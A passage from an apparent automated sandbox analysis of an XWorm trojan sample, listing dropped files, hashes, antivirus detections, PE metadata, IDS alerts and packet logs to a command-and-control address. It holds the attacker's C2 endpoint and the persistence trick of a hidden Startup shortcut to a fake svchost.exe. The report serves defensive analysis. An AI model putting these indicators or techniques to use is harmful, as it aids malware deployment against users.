                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxxdjqdc.zvf.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\svchost.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):135376
                                                                                        Entropy (8bit):4.405934262487606
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:U+QEJBJj1LAIHs8K0LYuSwjXuzy1qGuOAzyfyOgBk9C7oI8S8hrxVoI1K:DtBNNq2Xugk7k9PoD
                                                                                        MD5:418F363765E0400FFA7E1FE93866DDEB
                                                                                        SHA1:9C40B8B8308E7A87F781F02F6B1ADD7C646317D3
                                                                                        SHA-256:72E80F29189F332C8FCB9C88A24E62B28A35BB4CE8E63A2F19C6AC3618F79D58
                                                                                        SHA-512:3557DCBEB2AA7F8A13F308AC2287A07F7028FFE79D4537444238212AC787106EA0420001DC3238C6599DA8D4AFDC7CA7A154734E227B959A3D5E663C90521098
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j............"...0.............Z.... ... ....@.. .......................`......F.....`.....................................O.... .......................@......p...8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................:.......H........"...............................................................0..'.......r...p..(....(..........(........o.........8.............o....r...p(....,a..o.....i.3U..o.........+?.........o.........(....(....,..........%...o....t.....+....X.......i2...(....-....X.......i?k.....(....,O.o.........(....,2..o.........-.....o....&*.........%........o....&*r...p(....*rx..p(....*..0...........(..........+Y...o......r...p..( ........3.r*..p... ...(!...rh..ps"...z..:(....(#.....(.

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 18 09:41:40 2024, mtime=Fri Oct 18 09:41:40 2024, atime=Fri Oct 18 09:41:40 2024, length=135376, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):946
                                                                                        Entropy (8bit):5.071007646464703
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:8sZnZni04spnu8ChmQAlXIsaum2X8eRNWZ9fjAXaA/e1jawuLgz3k44t2YZ/elFH:8LUDPlXDX9RgrAXaA/e4AXqygm
                                                                                        MD5:F4938DC1D9EDAB485EF536CA39EDC475
                                                                                        SHA1:84947D507736DD3478E37C82D807D3D3728C8241
                                                                                        SHA-256:5C104A5E848EED34F19C6C5AAD842696B34FC9C6029E8DD6821175D9AB2434AE
                                                                                        SHA-512:A988946D80D0E9D02D69E77C378FB81413909A4F2CADC9BAD27FE07D8DA277BBF1405369DECEC4456ABEAABC48C50366DEF8DE39453908564454DFB39841A566
                                                                                        Malicious:false
                                                                                        Preview:L..................F.... ......PJ!.....PJ!.....PJ!..........................p.:..DG..Yr?.D..U..k0.&...&.......$..S.....7>J!....PJ!......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2RY'U...........................^.A.p.p.D.a.t.a...B.P.1.....RY%U..Local.<......EW<2RY'U....[.....................oOo.L.o.c.a.l.....b.2.....RY5U .svchost.exe.H......RY5URY5U....S......................m0.s.v.c.h.o.s.t...e.x.e.......Z...............-.......Y.............f~.....C:\Users\user\AppData\Local\svchost.exe..#.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.s.v.c.h.o.s.t...e.x.e.........|....I.J.H..K..:...`.......X.......468325...........hT..CrF.f4... ..&..Jc...-...-$..hT..CrF.f4... ..&..Jc...-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.469584475806323
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:wzZfpi6ceLPx9skLmb0fEZWSP3aJG8nAgeiJRMMhA2zX4WABluuN1jDH5S:mZHtEZWOKnMM6bFpjj4
                                                                                        MD5:0BAA478F13D061C5ED6BF1AAE008E50E
                                                                                        SHA1:12CA46A0896463D992260C1F1CDD6ECAEEEB5CC8
                                                                                        SHA-256:A4F964D26FA4BEC493BF7583973043B3D3185E52001163DF01B4D38AD68686F3
                                                                                        SHA-512:2D72FA78BD9AF2DE6065C93381C23265E315CBE52D6D59029A3C22C94CB89E5BBEF0447CD0839C057081A87A7590204CFA6300BE20047EA5B485467E4F3F1BBE
                                                                                        Malicious:false
                                                                                        Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....J!.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):4.405934262487606
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        File size:135'376 bytes
                                                                                        MD5:418f363765e0400ffa7e1fe93866ddeb
                                                                                        SHA1:9c40b8b8308e7a87f781f02f6b1add7c646317d3
                                                                                        SHA256:72e80f29189f332c8fcb9c88a24e62b28a35bb4ce8e63a2f19c6ac3618f79d58
                                                                                        SHA512:3557dcbeb2aa7f8a13f308ac2287a07f7028ffe79d4537444238212ac787106ea0420001dc3238c6599da8d4afdc7ca7a154734e227b959a3d5e663c90521098
                                                                                        SSDEEP:3072:U+QEJBJj1LAIHs8K0LYuSwjXuzy1qGuOAzyfyOgBk9C7oI8S8hrxVoI1K:DtBNNq2Xugk7k9PoD
                                                                                        TLSH:8CD30B341DFA5029F1B3DFB24BE8B9D9E96BF7733A05685E2085030A4623E41DED1639
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j............"...0.............Z.... ... ....@.. .......................`......F.....`................................

                                                                                        File Icon

                                                                                        Icon Hash:00928e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x42095a
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:true
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xCBCC6AB0 [Sat May 7 17:51:44 2078 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Authenticode Signature

                                                                                        Signature Valid:false
                                                                                        Signature Issuer:E=contato@email.com.br, CN=app, OU=app, O=app, L=Brasil, S=UF, C=BR
                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                        Error Number:-2146762487
                                                                                        Not Before, Not After
                                                                                        • 06/07/2024 20:07:53 06/07/2025 20:07:53
                                                                                        Subject Chain
                                                                                        • E=contato@email.com.br, CN=app, OU=app, O=app, L=Brasil, S=UF, C=BR
                                                                                        Version:1
                                                                                        Thumbprint MD5:386ADD5D9463BC64DCF9A92B6B2515A2
                                                                                        Thumbprint SHA-1:3102E336169D2D86D14DDEE2B6B17D9780D29F06
                                                                                        Thumbprint SHA-256:ACF3DAA83CBBD143495CE379227CBC7512878E1D8424257EA3E6F446577458F0
                                                                                        Serial:3DC3348BE9B71C81698B4995EB07601D27072D3A

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x209060x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x702.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x1f6000x1ad0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x208700x38.text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x1e9600x1ea00c2988416b98869a04b821df16756ae26False0.48598533163265306data4.062329838278973IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x220000x7020x80084757a6a117548f7adbdfd87b7885c97False0.400390625data4.0095667445369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x240000xc0x2003f623c5c047f201b42d50bc5a1b0223aFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0x220a00x3b0data0.4470338983050847
                                                                                        RT_MANIFEST0x224500x2b2XML 1.0 document, ASCII text, with CRLF line terminators0.5231884057971015

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-18T12:41:50.286751+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660606104.26.3.16443TCP
                                                                                        2024-10-18T12:41:56.779940+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660609104.26.3.16443TCP
                                                                                        2024-10-18T12:42:03.212851+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660615104.26.3.16443TCP
                                                                                        2024-10-18T12:42:06.139633+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660616104.26.3.16443TCP
                                                                                        2024-10-18T12:42:09.095164+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660619104.26.3.16443TCP
                                                                                        2024-10-18T12:42:12.046276+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660621104.26.3.16443TCP
                                                                                        2024-10-18T12:42:17.972385+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660626104.26.3.16443TCP
                                                                                        2024-10-18T12:42:27.686341+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660633104.26.3.16443TCP
                                                                                        2024-10-18T12:42:43.684025+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660650104.26.3.16443TCP
                                                                                        2024-10-18T12:42:50.022094+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.660657194.5.152.2154443TCP
                                                                                        2024-10-18T12:42:53.229372+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660658104.26.3.16443TCP
                                                                                        2024-10-18T12:43:07.296793+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660671104.26.3.16443TCP
                                                                                        2024-10-18T12:43:19.374937+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660681104.26.3.16443TCP
                                                                                        2024-10-18T12:43:22.687328+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660684104.26.3.16443TCP
                                                                                        2024-10-18T12:43:36.066149+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660695104.26.3.16443TCP
                                                                                        2024-10-18T12:43:39.695261+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660699104.26.3.16443TCP
                                                                                        2024-10-18T12:43:49.543669+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660711104.26.3.16443TCP
                                                                                        2024-10-18T12:43:51.958734+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660713104.26.3.16443TCP
                                                                                        2024-10-18T12:43:53.042994+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660714104.26.3.16443TCP
                                                                                        2024-10-18T12:43:54.109771+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660716104.26.3.16443TCP
                                                                                        2024-10-18T12:43:56.182511+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660718104.26.3.16443TCP
                                                                                        2024-10-18T12:43:57.846838+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.660721194.5.152.2154443TCP
                                                                                        2024-10-18T12:44:00.162341+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660722104.26.3.16443TCP
                                                                                        2024-10-18T12:44:03.818485+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660725104.26.3.16443TCP
                                                                                        2024-10-18T12:44:09.499486+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660732104.26.3.16443TCP
                                                                                        2024-10-18T12:44:10.492146+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660734104.26.3.16443TCP
                                                                                        2024-10-18T12:44:13.395937+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660736104.26.3.16443TCP
                                                                                        2024-10-18T12:44:16.018502+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660738104.26.3.16443TCP
                                                                                        2024-10-18T12:44:26.087610+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660751104.26.3.16443TCP
                                                                                        2024-10-18T12:44:27.071776+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660752104.26.3.16443TCP
                                                                                        2024-10-18T12:44:30.359936+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660755104.26.3.16443TCP
                                                                                        2024-10-18T12:44:35.823104+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.660760104.26.3.16443TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 18, 2024 12:41:41.109137058 CEST605914443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:41.114326954 CEST444360591194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:41.114470005 CEST605914443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:41.314471006 CEST605914443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:41.336359978 CEST444360591194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:41.762943029 CEST444360591194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:41.763005972 CEST605914443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:46.006694078 CEST605914443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:46.011885881 CEST444360591194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.021429062 CEST606044443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:46.027719021 CEST444360604194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.027801991 CEST606044443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:46.055473089 CEST606044443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:46.088208914 CEST444360604194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.123708010 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:46.123749018 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.123800039 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:46.133446932 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:46.133462906 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.820177078 CEST444360604194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.820245028 CEST606044443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:46.889748096 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.889818907 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:46.891844034 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:46.891853094 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.892093897 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:46.984507084 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:47.031400919 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:47.320413113 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:47.320466042 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:47.320525885 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:47.320545912 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:47.322498083 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:47.322550058 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:47.322556973 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:47.322571039 CEST44360605104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:47.322612047 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:47.328418970 CEST60605443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:49.353563070 CEST60606443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:49.353610039 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:49.353714943 CEST60606443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:49.354084969 CEST60606443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:49.354094982 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:49.971117020 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:49.973825932 CEST60606443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:49.973845959 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:50.286751032 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:50.286803007 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:50.286855936 CEST60606443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:50.286866903 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:50.288044930 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:50.288093090 CEST60606443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:50.288099051 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:50.288153887 CEST44360606104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:50.288268089 CEST60606443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:50.288595915 CEST60606443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:51.299662113 CEST606044443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:51.304718018 CEST444360604194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:51.309742928 CEST606074443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:51.314732075 CEST444360607194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:51.314820051 CEST606074443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:51.342392921 CEST606074443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:51.347560883 CEST444360607194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:52.039398909 CEST444360607194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:52.039537907 CEST606074443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:52.300645113 CEST60608443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:52.300707102 CEST44360608104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:52.300827980 CEST60608443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:52.301062107 CEST60608443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:52.301084995 CEST44360608104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:52.969383001 CEST44360608104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:52.971080065 CEST60608443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:52.971101046 CEST44360608104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:53.604140997 CEST44360608104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:53.604180098 CEST44360608104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:53.604252100 CEST60608443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:53.604276896 CEST44360608104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:53.604825020 CEST44360608104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:53.604899883 CEST44360608104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:53.604952097 CEST60608443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:53.663326979 CEST60608443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:55.674701929 CEST60609443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:55.674796104 CEST44360609104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:55.674879074 CEST60609443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:55.675173998 CEST60609443192.168.2.6104.26.3.16
                                                                                        Oct 18, 2024 12:41:55.675201893 CEST44360609104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:56.283963919 CEST606074443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:56.288132906 CEST606104443192.168.2.6194.5.152.215
                                                                                        Oct 18, 2024 12:41:56.436640024 CEST44360609104.26.3.16192.168.2.6
                                                                                        Oct 18, 2024 12:41:56.438126087 CEST444360607194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:56.438158035 CEST444360610194.5.152.215192.168.2.6
                                                                                        Oct 18, 2024 12:41:56.438256979 CEST606104443192.168.2.6194.5.152.215
